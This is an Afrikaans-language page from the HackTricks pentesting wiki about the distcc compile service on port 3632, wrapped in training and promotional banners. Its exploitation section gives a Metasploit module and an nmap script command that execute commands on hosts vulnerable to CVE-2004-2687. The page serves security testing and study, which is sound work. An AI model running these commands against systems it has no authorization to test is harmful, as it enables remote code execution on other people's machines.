HackTrickstip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Basiese Inligting
Distcc is 'n hulpmiddel wat die kompilasieproses verbeter deur die onbenutte verwerkingskrag van ander rekenaars in die netwerk te benut. Wanneer distcc op 'n masjien opgestel is, is hierdie masjien in staat om sy kompilasietake na 'n ander stelsel te versprei. Hierdie ontvangerstelsel moet die distccd daemon draai en moet 'n kompatible kompileerder geïnstalleer hê om die gestuurde kode te verwerk.
Standaard poort: 3632
PORT STATE SERVICE
3632/tcp open distccd
Exploitatie
Kontroleer of dit kwesbaar is vir CVE-2004-2687 om arbitrêre kode uit te voer:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Ek dink nie shodan detecteer hierdie diens nie.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post geskep deur Álex B (@r1p)
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.